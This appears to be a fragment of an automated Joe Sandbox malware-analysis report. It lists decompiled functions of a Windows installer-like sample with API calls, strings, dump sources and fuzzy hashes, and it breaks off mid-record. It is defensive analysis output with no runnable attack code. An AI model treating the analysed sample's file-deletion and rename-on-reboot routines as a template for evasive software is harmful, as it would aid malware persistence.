                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: L2h$\2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 730355536-2574461566
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045A170 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Deleting directory: %s, xrefs: 0045A1BF
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                                                                                                                                                                                                                                                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                                                                                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                                                                                                                                                                                                                                                                                                  • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                                                                                                                                                                                                                                                                                                  • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseErrorFindLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 754982922-1448842058
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 87d97c0d503803958fd875aa1a184fcfda1626f71f0f0dffbe8b645deca1459e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d97c0d503803958fd875aa1a184fcfda1626f71f0f0dffbe8b645deca1459e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EB4
                                                                                                                                                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EC3
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                                                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422FCF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 862346643-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2a5f925bef059f14e9d6c5975d0da68960f8d3bae7e7461ff5cd8078bc51d13f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a5f925bef059f14e9d6c5975d0da68960f8d3bae7e7461ff5cd8078bc51d13f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042F2A0 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveLong$Message
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2785966331-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 09d7f37050b0567ee29fe8455e9c964ed726054a65f14973020f619371741b48
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09d7f37050b0567ee29fe8455e9c964ed726054a65f14973020f619371741b48
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000), ref: 0042949A
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 361401722-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                                                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                                                                                                                                                                                                                                                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ObjectStock$A4620A480A570IconLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2905290459-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004635AC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$Load
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $ $Internal error: Item already expanding
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1675784387-1948079669
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004723E4 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: "*G$"*G
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-450946878
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ab88a2058fedbe1f7e6c7f1e41183f8997bb8702fc8fab432acd6a1ab89d893
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab88a2058fedbe1f7e6c7f1e41183f8997bb8702fc8fab432acd6a1ab89d893
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00453D1C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 390214022-3304407042
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b78ede8a23c37cfcf17a9c456894b4a3e9d266ee139fb23f8432ab3fcd8b7dcf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b78ede8a23c37cfcf17a9c456894b4a3e9d266ee139fb23f8432ab3fcd8b7dcf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00476B6C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                                                                                                                                                                                                                                                                                                  • 73EA59E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
